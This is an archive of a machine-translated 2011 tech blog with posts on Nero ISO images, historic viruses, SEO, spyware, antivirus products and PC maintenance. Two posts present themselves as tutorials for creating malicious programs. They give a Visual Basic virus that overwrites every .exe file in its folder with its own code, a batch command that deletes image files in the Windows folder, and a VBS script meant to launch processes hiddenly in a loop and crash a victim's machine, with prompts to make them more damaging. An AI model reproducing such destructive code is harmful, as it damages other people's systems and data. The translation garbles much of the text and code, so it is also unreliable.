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Friday, July 29, 2011

How to create ISO image with Nero Express

Nero Express is a program that, in addition to its multiple functions, has tools for management operations and recorded file copy. It also lets you create ISO and NRG files to an indirect method, ie no need to download any application for conversion. Generally, Nero Express comes bundled with DVD burners, so you can easily access the OEM version and create your own disk images to duplicate.
Thus, to generate a NRG or ISO file with Nero, you can simply log into Nero Smart Start menu -> Nero -> Nero StartSmart. On the "Copy and support", click on "Copy DVD":

Now, with the disc in your drive, you'll go to the button "More <<":

In that window, you must provide an address or path where you saved the ISO or NRG extension, then copy and wilt here:

Once the store directory, you'll have to start copying the disc:

On the next screen you will see how to generate the image:

When finished running the task, Nero will eject the disc and ask you to sign the path where you saved the ISO or NRG. You should copy it using the [Ctrl + C] and paste [Ctrl + V] to another folder:

Finally, we'll click "Cancel" to delete the file vista.nrg, but keep a copy. This way you can make copies using Nero when needed.

Wednesday, July 27, 2011

The 10 most destructive(Ever) viruses of history

In chronological order here are the 10 most destructive viruses of all time.

The 10 most destructive viruses

• Blaster
• Melissa
• Sobig.F
• Bagle
• Code Red
• MyDoom
• SQL Slammer
• Sasser

1. CIH (1998)

Estimated Damage: 20 to 80 million, not counting the price of information destroyed.

Location: From Taiwan in June 1998, CHI is recognized as one of the most dangerous and destructive virus ever seen. The virus infects Windows executable files 95,98 and ME and was able to stay resident in memory of the infected computers and infect other executables.

Why?: What made it so dangerous was that soon affected many computers could rewrite data on the hard disk and leave it inoperable.

Trivia: CIH was distributed in one or the other major software as a demo game Activision "No".

2. Melissa (1999)

Damage Estimate: 300 to 600 million dollars

Location: A Wednesday March 26, 1999, W97M/Melissa became home to many revolving around the world. One estimate says that this script affects 15% to 20% of the world's computers.

Trivia: The virus used Microsoft Outlook to send further 50 of the users contact list. The message contained the phrase, "Here Is That You Asked document for ... do not show anyone else. ;-) "And was accompanied by an attached Word document, which was implemented by thousands of users and allowed the virus to infect computers and propagate through the network.

3. ILOVEYOU (2000)

Damage Estimate: 10 to 15 billion dollars

Location: Also known as "Loveletter" and "Love Bug", this was a Visual Basic script with an ingenious and irresistible candy: Promises of love. A May 3, 2000, the ILOVEYOU worm was first detected in Hong Kong and was transmitted via email with the subject "ILOVEYOU" and attachment, Love-Letter-For-YOU.TXT.VBS
Similarly, Melissa was sent to all contacts in Microsoft Outlook.

Why?: Thousands of users were attracted by the subject and clicked on the infected attachment. The virus also took the liberty of overwriting music files, pictures and more.

Trivia: As the Philippines had no laws that talk about virus writing the author of ILOVEYOU was not charged.

4. Code Red (2001)

Damage Estimate: $ 2.6 billion

Location: Code Red was a worm that infected computers for the first time July 13, 2001. It was a virulent bug because its objective was to attack computers that have the server (IIS) Microsoft's Internet Information Server. The worm was able to exploit a major vulnerability of this server.

Trivia: Also known as "Bady" Code Red was designed for maximum damage. In less than a week infected almost 400,000 servers and over a 1,000,000 in its short history.

5. SQL Slammer (2003)

Damage Estimate: Because SQL Slammer appeared on Saturday the economic damage was low. However, this attack 500,000 servers.

Trivia: SQL Slammer, also known as "Sapphire", dates from January 25, 2003 and its main focus is server, the virus was a 376-byte file that generated a random IP address and sent asimismoa these IPs. If the IP running under Microsoft's SQL Server Desktop Engine unpatched could be sent back to other IPs at random.
Slammer infected computers in 10 minutes 75.000.

6. Blaster (2003)

Damage Estimate: 2 to 10 billion dollars, hundreds of thousands of infected computers.

Location: The summer of 2003 became known Blaster also called "Lovsan" or "MSBlast".
The virus was detected on August 11 and spread rapidly in just two days. Conveyed through a vulnerability in Windows 2000 and Windows XP, and when it was triggered open a dialog in which the shutdown was imminent.

Trivia: Hidden in the code was curious MSBLAST.EXE topics:

    "I just want to say LOVE YOU SAN!" And "billy gates why do you Make this possible? Stop making money and fix your software! "

    "I just want to say I love you san!" And "billy gates Why do possible? for making money and fix your software! "

7. Sobig.F (2003)

Damage Estimate: 5 to $ 10 billion and more than one million infected computers.

Location: Sobig also attacked in August 2003 a horrible month for security. The most destructive variant of this worm was Sobig.F, who attacked the August 19 generating over 1 million copies of itself within the first 24 hours.

Trivia: The virus spread via e-mail and attached files as application.pif thank_you.pif. When activated, transmitting.
On September 10, 2003 the virus has also disabled and was no longer a threat, Microsoft offered in its day to that $ 250,000 to identify its author.

8. Bagle (2004)

Damage Estimate: $ 10 million and counting ...

Location: Bagle is a sophisticated worm that made its debut on January 18, 2004.
The code systems infected with a traditional mechanism, attaching files to an email and spread it.
The real danger of Bagle is that there are 60 to 100 variants of it, when the worm infects a computer open a TCP port that was used by an application to remotely access the system data.

Curiosities: The Bagle.B variant was designed to stop the January 28, 2004 but numerous other variants of the virus continue to operate.

9. MyDoom (2004)

Damage Estimate: Internet performance lags by 10% and page loading by 50%.

Location: In a few hours of January 26, 2004, MyDoom went around the world. Was transmitted via mail by sending an error message of course but also attacked the shared folders of users of the Kazaa network.

Curiosities: MyDoom was programmed to stop after the February 12, 2004.

10. Sasser (2004)

Damage Estimate: $ 10 million

Location: April 30, 2004 was its release date and was destructive enough to hang some French agency communications satellites.
Also managed to cancel flights many airlines.

Curiosities: Sasser was not transmitted via mail and did not require users to spread. Each time the worm was Windows 2000 and Windows XP this was not replicated to date, infected systems experiencing great instability.

Sasser was written by a young German of 17 years who spread the virus in their 18 birthday. As he wrote the code to be less standing out well but was found guilty of computer sabotage.

Friday, July 22, 2011

SEO Writing: Articles vs content

The writing is very different when it is optimized for search engines for a particular item (a blog post) when it is for a page of a site. We must take into account the characteristics of each text to translate web optimization strategy.
If the wording is for a blog post, with a particular topic, with an area more or less clearly determined by the subject or the editorial line of a blog, because the characteristics will be described along our Guide SEO Copywriting. Namely, optimized titles, keyword density, not very long sentences, a pyramid of information, basic structure optimized, and so on.
This differs when we need to draft a part of the web. For example, we are starting a site and it's time to fill the pages of textual content of the site. The final idea remains the same for both cases: the texts have optimized our site, whether blog or a html site in common. But unlike the article, the texts common sites are closely related to web design and extension generally short and concise.
The relationship with the web design should not be an impediment to optimization. On the contrary. For example, the titles of our site, which are usually with colorful letters with pre-designed fonts, and so on. We should always avoid using titles with images only a cosmetic issue. Must be made in text with different fonts and colors if you like, but in text. To optimize them, nothing better than <h1>!
The rest of the text on each page, though short, should contain keywords highlighted and hyperlinked (if possible) should be clear, well-distributed information. We must spare no text on our website. Although the characteristics and trends of the modern turn to clear sites, with slide images and little text, the text continues to be the king in the web optimization.

How to create a computer virus''stupid and malicious "- 2nd part

Computer viruses are in many forms with many different functions. Some are rather simplistic and can be detected by the average user while others are complex and go unnoticed for some time. The most common viruses within the classification of file infectors, which work by infecting executable files. They do this by inserting malicious code into an area of ​​the original file, allowing it to be executed each time the file is accessible Some of them are able to completely overwrite a file, making a whole program useless .
This is the case of this type of virus that we see today. Overwritters viruses. I know that the virus overwritters, unfortunately, have no chance to spread and they are not "intelligent". Despite all this overwritters can help you understand the basics of real virus. I'll give you the code first and then we will review it.
-=-=-=-=-=-=-=-=-=- Cut here =-=-=-=-=-=-=-=- =-=-=

Option Explicit Option Explicit
Dim MyArray () As Byte Sun myarray () As Byte
Sun victim As String Dim As String victim
Const MySize As Integer = 11776 Const MySize As Integer = 11776

Private Sub Form_Load () Private Sub Form_Load ()
On Error Resume Next On Error Resume Next
Free Free Sun Sun
Free = FreeFile Free = FreeFile

Open App.Path & "\" & & App.EXEName. "Exe" For Binary Access Read As # Free Open App.Path & "\" & & App.EXEName. "Exe" for Binary Access Read As # Free
ReDim myarray (MySize) ReDim MyArray (MySize)
Get # 1, 1, myarray myarray Get # 1, 1,
Close Close # # Free Free

victim = Dir (App.Path & "\" & "*. EXE") victim = Dir (App.Path & "\" & "*. exe")
While victim <> "" While victim <> ""

Open App.Path & "\" & victim For Binary Access Write As # Free Open App.Path & "\" & victim for binary access write as # Free
Put # 1,, myarray Put # 1,, myarray
Put # 1,, MySize Put # 1,, MySize
Close Close # # Free Free

victim = Dir () victim = Dir ()

Wend Wend

End End
End Sub End Sub

-=-=-=-=-=-=-=-=-=- Cut here =-=-=-=-=-=-=-=- =-=-=

Decode all this: (yum! J)
Option Explicit Option Explicit
Dim MyArray () As Byte Sun myarray () As Byte
Sun victim As String Dim As String victim
Const MySize As Integer = 11776 Const MySize As Integer = 11776 Here, we define the variables we will use the "myarray ()" variable that contains the binary code of the virus, "victim" is the variable that contains the file name of the victim and the "MySize" variable contains the size the virus.
Private Sub Form_Load () Private Sub Form_Load ()
On Error Resume Next On Error Resume Next We open the subfolder that we will use (Form_Load), and we have our error handle that is to say that in case of error the program will stop there.
Free Free Sun Sun
Free = FreeFile Free = FreeFile It's a good idea to follow the example of the Y2K virus. This will get rid of the read / write errors because it is open source.
Open App.Path & "\" & & App.EXEName. "Exe" For Binary Access Read As # Free Open App.Path & "\" & & App.EXEName. "Exe" for Binary Access Read As # Free
ReDim myarray (MySize) ReDim MyArray (MySize)
Get # 1, 1, myarray myarray Get # 1, 1,
Close Close # # Free Free Now let's get out the binary code of our virus and we store it in the variable "myarray".
victim = Dir (App.Path & "\" & "*. EXE") victim = Dir (App.Path & "\" & "*. exe")
While victim <> "" While victim <> ""

Open App.Path & "\" & victim For Binary Access Write As # Free Open App.Path & "\" & victim for binary access write as # Free
Put # 1,, myarray Put # 1,, myarray
Put # 1,, MySize Put # 1,, MySize
Close Close # # Free Free Here, we define the variable "victim" and we have our binary code in the program of the victim.
victim = Dir () victim = Dir ()

Wend Wend Then we put the victim at zero, and we repeat the whole process to infect all files. Exe in the current directory.
End End
End Sub End Sub And finally, we close the program and sub folders. 

***NOTE- This is only for learning,Do not misuse this.

How to create a computer virus''stupid and malicious "

Hello everyone.
Today I chose to speak about the virus, there's lots, we all have been infected at some time or another by these programs. Because before any virus is a program.
We'll see how it works but also how to create, of course!
In this first part, we'll start with fairly simple virus you will see:
Virus VB (Visual Basic):
This type of virus are the oldest and were among the first to have appeared.

Create a small virus not too bad ...

First of all I wish to warn you that this article is only for educational purposes, and you are not encouraged to reprtoduire this on your pc. You are responsible for your actions and neither I nor my host does seon held responsible.

We will learn to create a small virus * beats. :

It went:

To begin, open your favorite text editor (eg notepad). Then, without skipping steps online:

del c: windows *. bmp cls

After, enrigistrer code with the extension *. bat

Caution: Never open the file on your computer, the virus will run!

How it works explanation:

del c: windows *. bmp

del: used to remove
C: Windows is the folder where the command should be held
*: Followed by an extension means all files with that extension in this example the extension is *. bmp. So this mini virus will delete all files with the *. bmp (in locurrence images) found in windows.

This virus may be more dangerous if you change the extension in a more important but, I leave to your imagination free choice ^ ^

Create a nastier virus ...

know you dream of planting pc easily? ^ ^

It went:

Start by opening your text editor.
Then slaps the following code:

Set variable = CreateObject ("WScript.Shell")
Do "notepad", false

After, save with the name you want, with the. Vbs

Small clarification:

Here, the notebook (that of windows) is the desired application, you can replace it with a heavier application (for faster results and better).
false: indicates that windows should not be initialized, only the process that the victim did not realize.
Loop means that it must be done in a loop: it must start the notebook, again and so on.

These viruses were created in Visual Basic,

***NOTE- This is only for learning,Do not misuse this.

Thursday, July 21, 2011

Sign in to Windows with your face

If you have a webcam this application you'll be interested, since you can use to log into Windows very easily.

Blink! allows you to access your account, just looking at your webcam. Just install Blink! on your computer, then start with Windows in the Starup (Windows startup programs). From there, no longer requires any further action on your part. Just sit in front of your computer, and Blink! using facial recognition to verify your identity and then logs on.

Blink! not save the record entry, but you can see a picture of all that success is connected to your PC. That only makes it quite useful.

It's free so if you want to use your webcam to log in to Windows only download Blink!

download here


Temporary Internet Files - the Good, the Bad and the Ugly

With a little time invested in learning about internet security can go take a road accident prevention in the team. Temporary Internet files are not something to be feared, but it certainly must be careful to trust them and how to deal with them.
Temporary Internet files are image, text and format of the files that are stored on your hard drive by websites you visit. They are there for the Web without having to do anything. The files are stored on your computer the first time you visit the site for the next time you go to that website is enough to load new data or files that have changed since the last time you visited - files that have changed are uploaded to the folder of temporary Internet files at speeds much faster than over the Internet.
Store temporary Internet files on the hard drive significantly reduces the amount of time it takes to fully charge and view a website.
However, it should be considered in any discussion about temporary internet files. First, and possibly the most trivial of the concerns is that it is possible to lose all the updates the website. If your browser loads the files in the Temporary Internet files instead of the updated material from the website, you may miss a football score of the day, or you can get a different image that others are watching. The system is designed so that stuff does not happen, but the possibility is there.
Secondly, The storage of large files can clog itself. Fortunately, you can control the number or size of files that are stored on your hard drive. Normally in the Tools> Options menu of your browser may fix the amount of your hard drive that is willing to devote to the Temporary Internet Files. Depending on your habits and Navigation of the need for speed.
Third, the temporary files folder of the Internet may contain viruses, inappropriate images or text, files they may cause leakage of personal information Web sites.
Let me mention some things you can do to bring some control to your folder of temporary Internet files without destroying it completely.
I already mentioned that can limit the amount of your hard drive dedicated to hosting files from web sites visited. This is the best option for those who may be less concerned about inadequate or damaged files that are stored and more concerned about the ability of their Jurassic-era computer to perform at a decent speed. Some versions of popular browsers will not allow you to completely eliminate storing files, but may limit resources to 1% of your hard drive or a small number of megabytes
Some opt to regularly clean your temporary files folder of the Internet - this is obviously going to remove malicious files and free up some space for your team, but also remove the files you want.
In my opinion, the most prudent option is to use software available to manage the contents of Temporary Internet files. Some files you want, because they make life easier. Some files that do not want to because the team is stuck. There are computer programs that scan your computer and find all the files from the Internet (including cookies). The software makes recommendations as to whether the file in question is good, bad or ugly - all you have to do is decide to keep or trash.

SEO-positioning techniques and techniques worth

Advisable when the website is very large or difficult that search engines can follow the links on the menus (for example, by using javascript or flash, and can not read it). The site map should be put text links to all pages of the site, the search can thus access all of our website. However, do not put more than 100 links per page as this can be penalized.
Avoid using flash, PDF and javascript as far as possible
Avoid unnecessary use of flash files, the search engines index and find it very difficult in most cases do not. Same with pdf files, although less problematic than the first, can also create difficulties in indexing. For its part, the javascript code presents another problem for search engines as most can not follow the links they contain, so if your menu is done in javascript probably only get indexed your page.
Adhere to web standards
Validate our pages in accordance with the standards will help indirectly by search engine rankings as validating our pages we are reviewing possible bugs that can cause difficulties for the robots to index our pages, or they are not correctly the user. The easier it put the robots to index your site better. To achieve this, a thorough review of manuals W3C (the organization that creates web standards) and use the validator.
Maximum size of pages and links
The magic number for both cases is 100. No more than 100 links per page (best not to approach) and not more than 100 Kb weight. If you put more than 100 links on a page you run the risk of being penalized in search engines, so your position will fall dramatically or even erased from the database. Try not to exceed 80 links to be sure of not doing things wrong. As for the weight of the page, if it exceeds 100 Kb many search engines do not get the index, also the heavier the longer it takes to load, which is not recommended for the user.
Monitor the web, continuous positioning
Monitor the site and its positions on major search engines is a useful strategy for early detection of potential loss positions. To monitor positions are programs and websites that make it easier, for example, the Free Monitor for Google. However, when controlling positioning in Google, it should be noted that there is often a sharp drop of positions or the disappearance of our pages, especially when the site is new. This need not be bad, rather, is common and normal. If after a couple of days the situation has returned to normal you can start to worry.
Moreover, the issue of the positioning of websites constantly come and new things are obsolete before, so it may be that what you found useful at the time, now does not work for nothing or even harm you. Reason enough to keep up on this issue and renewed continually.
Tactics penalized in the search engine rankings
The penalty for websites that do unethical practices to position itself in the first search result is a strategy used by search engines to provide more interesting results to its users. When it detects that a page is taking actions not allowed, is penalized, which could include losing positions to make searches or even delete the results and Desindex. Among the reasons are to be penalized are:
1. Hidden text.
2. Duplicate websites.
3. Artificial links.
4. Cloaking and doorways.
Hidden text
It basically consists of placing text designed specifically for search engines is not visible to users in order to get a better search engine rankings. Webmasters who carry out these practices are devoted to writing words to fill your site and gain higher density there. For the user does not see, it is common to put the same color for the text and the background.
Duplicate Sites
This is to create identical sites (with the same content, etc.) to get links to the web you really want to position. This technique is quite frowned upon by search engines, so it must be avoided. Also, be careful when turning not to let Web site online the same in both directions could be penalized for having duplicate content.
Artificial links
It consists of artificially increasing the inbound links to a website. It can be done several ways, all of which are detrimental to our website sooner or later:
Spamming blogs and signature books, writing them with the sole intention of leaving the link to the web.
FFA and link farms, are pages dedicated to links to other pages, either paid or free, but over time are severely penalized by search engines, and the pages linked by them to be just pages with thousands links that do not contribute anything.
Cross-linking: making chain links with other sites known so that all link to all in a circle. If search engines detect that the only reason those links is to get a better position, can penalize them.
Cloaking and doorways
The cloaking is to make different sites depending on who visits it. Thus, the webmaster made fully optimized pages for different robots and pages for users to get high rankings on search engines. When a robot tries to track the page you are identified as such and is redirected to the page built specifically for him, so does the normal visitors.
The doorways are a special case of Cloaking, where optimized pages are made for the sole purpose of getting a good web search engine positioning. Normally, when the user tries to access them is redirected to the page? Really? using a javascript link (search engines can not read), while when the browser accesses the page you can browse it and unable to read the link javascript stores the page optimized for it.
Although these techniques may seem attractive, not in use, given that current browsers implement new detection methods for them, so sooner or later your pages will be penalized.

Wednesday, July 20, 2011

Top 10 spyware and adware threats identified

Webroot, a provider of award-winning anti-spyware solution, issued a press release identifying the ten most significant emerging spyware threats and adware. Most of these probably have not heard and a few may surprise you.
It is estimated that 9 out of 10 computers are infected with spyware, also known as adware, scumware, malware and many others.
Here are the top 10.
1. PurtyScan- popup ads mislead users with an installation method, claiming to find and delete pornographic images.
2. n-CASE - This program is usually comes with free software.
3. Gator - adware program that displays advertisements based on your browsing habits on the Web. This program usually is linked with the program Kazaa file-sharing and other free software programs.
4. CoolWebSearch- hijacked home page, Internet Explorer settings, and searching the Web.
5.Transponder - Take all the data entered into online forms and then provides targeted ads.
6.ISTbar / AUpdate- spyware posing as a toolbar. It has been prepared to show pornography, pop-ups, and hijack your homepage and Internet searches.
7. KeenValue- an adware program that collects personal information and serves ads.
8. Internet Optimizer- hijacks error pages and redirects them to its own site.
9. Perfect Keylogger- records all keystrokes (including personal information, passwords, etc), clicks and web sites visited.
10. TIBS Dialer- hijacks phone modem and redirects to porn sites pay for phone minutes. 

The following precautions are recommended in the fight against spyware: install Microsoft security patches, avoid downloading and using free downloads and disable ActiveX in Internet Explorer. In addition, install at least one anti-spyware program, some experts recommend that actually have two installed. For starters, you can download a removal program free spyware such as Spybot Search & Destroy and Ad-Aware. There are also some good anti-spyware programs on the market that proactively protect your computer often (alert you before the spyware is installed).

Computer Viruses

Computer viruses are software programs that have the ability to autoreproducirse between computer systems. This is commonly called the infection suffered by a computer. After the malware infection that starts to take action, obviously a hidden and not authorized by the user, which in most cases are detrimental to the system and affect one way or another to the user and computer. Typical examples might include the deletion or data theft, computer malfunction, manifested a slow, etc.

Actually, computer viruses today are considered a subfamily of what is called a more generic "malware" or what is, malicious code. Its name comes from the English malicius software. And within the malware and we include these viruses, Trojans, worms and other species that abound in the networks.

For what purpose are created?

In the decade of the 90 computer viruses were created by programmers who wanted to experiment with these techniques playback software and obviously there was no profit whatsoever. Rather, they sought fame or prestige within a community of technicians and computer, say a divertimento.

Today the landscape has changed a lot. We can say that malware creation has become more professional and there is a clear objective and lucrative crime.

An example that everyone has heard, seen or read in the press are attacks against online banking by Trojans. As I said a moment ago, are programs designed to steal our credentials. Once the phisher gets our data can impersonate your identity in the service of the bank and make transfers from your account.

There are real gangsters in the world who have seen this type of crime an excellent business, but the police chases them and in many cases end up in jail.

How are?

Although in the beginning used to be distributed by sharing infected floppy disks, today we can find malware that is distributed via USB pen drives and memory.

But undoubtedly the major distribution channel par excellence is the Internet through Web pages and services such as chat, instant messaging, email and social networks lately. We may also receive when you download malware executables from peer to peer

How many viruses are there?

Within the malware there are a lot of categories, such as viruses, trojans, worms, adware, spyware, scam, rogue, phishing, hoaxes, rootkits, spam, etc.. ? in short, is a long list that also increases day by day.

In turn there are subfamilies within each of these categories. Besides those mentioned, we can find macro viruses (a small program or set of actions) that infect office documents such as the typical virus in Word. O viruses that infect disks injecting its code into the boot sector and not allowing them to use the equipment.

Another interesting type of malware is one that is installed on your computer and encrypts all our information to us hard, displaying a message on screen if we want to retrieve that information (your photos, documents, music, movies, letters, etc.). We make a payment to a bank account after which we will receive a key program that allows us to recover your hard drive. It is what is called ransomware of ransom, kidnapping in English.

List of antivirus:-
Panda Software
You can try or buy "Titanium Antivirus and Platinum Internet Security." In addition the site has information on the latest viruses. If you want an online review at the end of this page have a check of Panda Antivirus.
McAfee security products and services on the Internet, it provides security to protect their business environments and content from viruses and malicious code.
Symantec (Norton)
Norton brand of security products for Symantec's consumer protection work on the desktop.
Its solutions protect the flow of data in your PC, email servers and Internet access.
Its flagship product is the "Brid Security Architecture". Protect data, communications, operating system and all applications. It's the old anyware.
Norman's products are available for home users who want to surf the Internet and for large corporations.
It is the leading provider of security solutions for equipment. In English.
Contains new versions 4.5 of Kaspersky in Castilian. Available for a wide range of operating systems.
AntiVir Personal Edition offers effective protection against computer viruses on personal computers. In English.
Virus protection for businesses and organizations of any size with its software and technical support 24 hours.
PER Antivirus
Against all viruses, macro viruses, worms, Trojans, Mail, IRC, Instant Messaging, P2P, Spyware, Adware, etc.. Receive 6 versions per year, daily updates and 24 hour support.
Current version obtained NOD32 4.0437 26 th VB 100%. Includes free tools to disinfect your computer.
AVG anti-virus
AVG Anti-Virus 7.0 wants to grow with your company or organization.
Individual solutions, free tools, antivirus online. "BitDefender Professional 7.2" on launch. Free upgrade.
An industrial strength firewall for desktops and small offices.
Based on the technology ALWIL offers real-time protection from all types of infections. Page in English.
Rav Antivirus
To permanently protect your computer from viruses, trojans and worms. Page in English.
Zone Alarm Antivirus
ZoneAlarm Antivirus provides essential security you need on the Internet, block viruses, hackers, etc.. In a single easy to use solution.
F-Secure Corporation protects individuals and businesses from computer viruses and other threats that extend across the Internet and mobile networks.
Clam AntiVirus
Clam is an antivirus toolkit for UNIX. The main purpose of this software is the integration with mail servers.
Real-time vaccine that protects against all possible virus entry: E-mail, Web, Web, shared resources, chat virus ...
Protection for the entry of viruses and spyware. It is more oriented toward antivirus spyware. In English
Protector Plus Antivirus is the best program against viruses, spyware, trojans and worms. Windows 98 onwards.

Use a Good Internet Security Software And Be Safe.

Microsoft sells 400 million licenses for Windows 7

11 July 2011, in its Worldwide Partner Conference this year, Microsoft announced that it has sold more than 400 million licenses of Windows 7 since its launch in 2009. 

Windows 7 has been adding many users as Facebook or Google +.
On 11 July, Microsoft reminded us once again and weight control, reporting that he has sold more than 400 million licenses of its operating system in the 20 months or more since its inception. This comes after news three months ago (just three months) where it was announced that the figures had reached 350 million licenses sold and remember that a year ago, in July 2010, Microsoft boasted of having 175 million licenses sold.

According to a new publication on his blog, the computer giant is selling 7copias Windows 7 every second. The operating system is used in 27.3 of the world's computers.

But what about Windows 8? The new OS is planned to be launched in 2012 and did not look anything like the current Windows 7.

It seems that Microsoft is positioning Windows 7 on a par with Windows 8, stating that many companies could "run a combination of Windows applications and devices 8 together with applications and PC Windows 7." Hopefully soon clarify what these statements mean.

Besides the good news in sales, Microsoft began this year its Global Partner Conference on 11 July with the announcement of the upcoming beta of the next version of Windows Intune. The company also shared his impressions of the new ultra thin laptop Sony VAIO Premium SA, which could have a battery of up to 15 hrs duration.

Microsoft could end the Windows brand

Andy Lees, President of Windows Phone, spoke at the Worldwide Partner Conference Microsoft about the company's plans to establish a unified ecosystem that includes PCs, tablets, smartphones and televisions. The statements from sources close to Microsoft suggests that the end of Windows could be close.

Nilay Patel posted on This is my next few days before, a source had told him about plans for the Redmond company to develop an operating system that was executed in tablets and smartphones but also game consoles, televisions and computers, and could see the light in about 4 years, coinciding with the end of the cycle (10 years) of the Xbox 360 and the 3 years is expected to take the path of Windows 8.

If we think about the current state of the supply of computers and mobile devices loses sense approach, in fact the same Lees said in the same event that Microsoft has no plans to produce tablets running Windows 7 Phone because they want to offer more powerful capabilities. But on the way towards the establishment of unified ecosystem and are Apple and Google, so the more likely that Microsoft is already working on adaptable operating system at all levels for some time.

According to the source This is my next, as part of Microsoft's strategy to establish such a unified ecosystem, managers would be considering the possibility of launching a brand new, so Windows will disappear.

It is still early to tell and many things can happen yet, as the new brand name, including Windows, but there is no doubt that this brand is the symbol of the era when computers arrived on the professional and private lives of millions people around the world.

Tuesday, July 19, 2011

Hardware Preventive Maintenance

Obviously at this point you're at a computer, look, watch, what is for you, What brings you benefits?, Have I given proper use?, Have I care as it should?, Would you have given preventative maintenance needs?, and here you're asking, What is preventive maintenance?

Preventive maintenance is the proper care you give your computer equipment, in advance of other mishaps that may occur over time due to not properly perform this measurement, ranging from software and hardware of a computer, the constant review each of these, taking into account several important points that will implement the hygiene, care for the area where the environment in which you install it, among others.

All these important points to keep influence in optimal condition, prolong their productive life in the system be reliable, caring and files were kept, to keep the programs without alteration, to sail at a reasonable speed and reliable. We bow to the preventive maintenance of hardware, which is the maintenance that is applied to all visible and tangible of the machine as a keyboard, screen, speakers, printer, processor, hard drive, enclosure, power supply, etc..

Which is not very complicated, with a good knowledge of the machine can get to do it yourself and save what you would spend hiring a specialist.

So do not worry! you just have to take into account the following 10 simple really.

1 . The physical location where you install it, careful not to put off the window as the sunshine dust accumulates more quickly, if where there is carpet, it would be important to constantly suck. You must make sure the electrical current that is installed there, which is suitable and stable.

2 .- Located in a cabinet that can be easily cleaned.

3 . Keep it in a place with adequate ventilation in hot weather and take it into an air-conditioning, more so in this city in which we live.

4 . Do not use the monitor as a shelf, people usually put things even get to stick them, generating more heat.

5 . Do not eat or smoke in front of her.

6 . Before use, always wash your hands.

7 . Having regulatory support.

8 . Clean the parts of the computer with a clean and free of dust, lint or other debris that interfere with hygiene, you can also use a liquid soap that does not contain many chemicals.

9 . Turning off the PC and let it cool put some bags that protect both the monitor and the keyboard, there are different forms and even affordable.

10 . Remember that before you install a computer to analyze everything, which satisfies the above (Berry, do a little examination of the scene).

We emphasis on cleanliness, highlighting the following:

For cleansing, first disconnect the power source and peripheral components of the PC. You can use a torch or small species but do not have, you can blow slightly parties. Review the internal components, for this you must know a little about how they connected each card, memory modules, hard disk, and so on. Watching it is in its right place and that are not loose or unstable. It is recommended that you open the wing when downloading your machine prior static electricity, to accommodate the screws so that when the closures will know how each screw.

Cleaning the monitor: It is recommended only if you uncork it will fix something and more complicated, because when you turn off the computer stores a lot of energy that can be harmful, that is why, if you have nothing just blow through the vents, clean the screen a dry cloth.

The Mouse: it is important to clean, opening the bottom, which is very simple, and turning the ball if your case or equally with the Optical Mouse, also watching the pad where you have to have no waste.

For CD-ROM, DVD, etc.: There are special discs for cleaning.

Peripherals: should be cleaned with a cloth with a little liquid soap and then alcohol-free cleaning with a dry cloth.

This maintenance tools:

- Wrist strap: prevents you from an energy charge. You should consider that before you touch any parts inside the PC is necessary to discharge static electricity from your body. This is made of a metal that conducts electricity and is connected to the earth pin physics, costs about $ 60.00 and $ 80.00; Rags dry lint-free brushes, screwdrivers, screwdrivers (to open the machine if necessary), isopropyl alcohol , which is a colorless, flammable alcohol, etc..

There is practical and simple.

Did you know? By doing this continuously depending on how you use it, you're free of many diseases, if so, would not only be saving the integrity of this unit but also your health. In January last year carried out an investigation, which was to make a comparison of the germs on your keyboard and toilet in an office. I think many people are not aware of germs and bacteria that can have your computer, maybe now you are with in using these bacteria. The main cause of these bacteria was in office workers ate up the computer leaving food scraps, crumbs, liquid, soda, coffee, etc.. This, but found the dust and created a call center of infection, causing diseases such as gastroenteritis is an inflammation of the intestine and urinary tract infections.

The day we take responsibility to acquire a computer, we must also take with it the responsibility to care for their life span is longer and meets all our needs adequately (jobs, consulting, video, wireless Internet, etc.).. As a mutual aid. So we start looking at our PC not only as an object of the technology, but also as an object that has its own needs. Turn to her and ask again what was raised earlier in this writing.

Preventive maintenance a habit that we must start from NOW

Take care and take care.

Corrective maintenance of hardware

You've probably heard a lot of corrective maintenance, or at least you have seen the need to replace or repair any part of your machine. This is what we call corrective maintenance.
Did we perform preventive maintenance to your PC?, If you did and your computer already suffered, you'll have to go this maintenance.
In the last entry we talked about the hardware preventive maintenance, corrective maintenance now talk of it, this depends on the other, as if not done properly preventive, corrective emerge, and there will be more difficult and expensive to early resolution.

Corrective maintenance is to remove, replace or operate anything that is not at peak performance, giving your machine problems and difficulty performing tasks. It ranges from a small repair such as welding or adjustment screws. In many cases, a better option is definitely changing the damaged item and replace it again, this long term will be more economical and beneficial as getting a brand new, guaranteed duration, and thus the performance in your machine.
There are 2 types of corrective maintenance are:
The unplanned: it is given without expecting it, comes without warning and requires their prompt resolution, if not, there might be costs, property damage or human adults. This happens most often in units with a more pronounced age, you do not know which and when it will be no failure. But when they arise will have to react quickly to your call for repair, but sometimes maybe you do not have the required tools.

The planned: this in contrast to the other, if programmed with time and know what to do when it occurs, already having on hand the material, tools, and prior knowledge.

This type of maintenance should be present in companies, of course as in any personal computer or workstation, but here there is a curious parenthesis to take more into account. In any business, requires a certain control data, which in no way can be lost, since in many cases these are vital to the integrity of it. It is therefore important to have an exclusive department for these failures corrective skilled in the subject, with extensive knowledge and experience.
Here are some points you will consider:

- Be very clear that we want, what use we give it.
- As some companies still use low-tech machines that is now obsolete but still useful for them, they do not need a super machine, one that meets your needs, such as simple accounting programs, databases, among other basic applications. Therefore must be parts of some components that are compatible with it, because they can then run out today because the technology is advancing rapidly and are pushing them out of the sale.
- Check that all the computers in optimal conditions, and often depends on one another.

- Have a separate budget for these setbacks.
- Have employees who know how to use your unit and hygiene regulations, and restrictions on use and misuse.
- Take points of repairs has been done and that you will, that is keeping track of the time that such failure occurred.
To change memory cards or the following recommendations:
1 .- Before turning off the machine, check that all your applications work properly, check any peripheral that will not fail as a mouse, keyboard, everything is properly before starting to open the machine.
2 .- All inspected, now if we will turn off and unplug all electrical power, and peripherals.
3 .- Remove the screws, noting where they go each to the final battle and cause no confusion, we recommend putting them in labeled jars, use a good screwdriver.
4 .- Remove the lid, if the CPU is "tower", put her down for comfort, and notes how each element is distributed, or the exact item you want to change.
5 .- Then download your energy or if you have an antistatic wrist strap better. Longer protected, now unscrew the card, or remove the memory you want to change, very carefully.

6 .- Now proceed to put a new one, settling into its proper place, without forcing, remember that everything has its side and you have to find the one.
7 .- I start now, you just have to screw everything back in place, close the cabinet, stopping the CPU, connect, power on and verify if installed properly, and Ready!
For the power supply and HDD is the same steps with only the following respective indications:
